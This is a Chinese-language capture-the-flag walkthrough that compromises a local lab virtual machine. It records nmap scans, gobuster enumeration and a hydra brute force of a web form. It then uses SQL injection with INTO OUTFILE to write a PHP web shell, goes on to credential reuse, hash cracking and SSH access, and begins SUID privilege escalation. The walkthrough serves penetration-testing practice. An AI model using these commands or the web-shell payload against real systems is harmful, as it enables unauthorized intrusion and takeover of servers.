目录
1、下载文件,使用虚拟机打开,虚拟机网络配置NAT模式
2、namp扫描内网网段,查找新出现的地址
nmap -sn 192.168.135.0/24
# -sn 扫描ip、不扫端口
3、端口探测
快速扫描一下端口
nmap --min-rate 10000 -p- 192.168.135.137
# --min-rate 10000 最小10000的速率扫描端口
4、发现端口,继续深入扫描、识别
nmap -sT -sC -sV -p80,111,777,52539 192.168.135.137-sT:使用TCP扫描
-sC:使用默认脚本扫描
-sV:探测服务系统
80端口有web服务
777端口是ssh(默认22)
5、访问80端口,查看信息
没有什么东西,扫一下目录
gobuster dir -u http://192.168.135.137 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
然后查看一下图片有啥东西
看到图片里有一串字符,猜测一下可能是某个密码,试了ssh、phpmyadmin,没成功
然后尝试一下是不是拼接目录,确实可以,然后一个框,测试一下应该是需要密码
6、暴力破解密码,用burp也行
hydra 192.168.135.137 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l z -P /usr/share/wordlists/rockyou.txt
7、新页面,尝试sql注入
使用密码登录后,出现新的搜索页面,返回语句是成功拿到数据,所以判断可能存在sql注入
双引号闭合,确实存在sql注入,可以用union,分别查询了数据库、版本、用户,这个地方就可以一直查询数据,查到用户名密码,我就不展示这个方法了
因为数据库版本是5.5.44,有上传页面,所以尝试一下写一句话进入上传页面。(如果没记错是5.6.34版本以下,secure_file_priv不做限制,可以用outfile进行写入一句话)
8、尝试写入一句话
union select "<?php system($_GET['a']); ?>","","" into outfile "/var/www/html/uploads/h.php";--+写入一句话需要知道绝对路径,猜测一下,一般情况是在/var/www/html中,然后拼接一下上传页面,其中一句话的另外两个值用空代替
显示上传成功,然后访问一下页面,尝试一下ls命令,确实能够执行
9、查看数据查询页面源码,看看有没有数据库连接信息
显示了,数据库账号密码,看一下phpmyadmin
可以登录,查看用户表
10、密码破解
看起来是bash64,破解一下
识别一下是什么密码,md5
然后尝试破解一下得到了一个密码,这时候就尝试尝试一下ssh连接
11、普通用户ssh连接服务器
注意:这个地方连接777端口,不是22端口
这就上来了,然后看一下用户,尝试提权
12、提权
suid提权。
find / -group ramses -type f 2>/dev/null | grep -v 'proc'
cat /home/ramses/.bash_history 
958
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
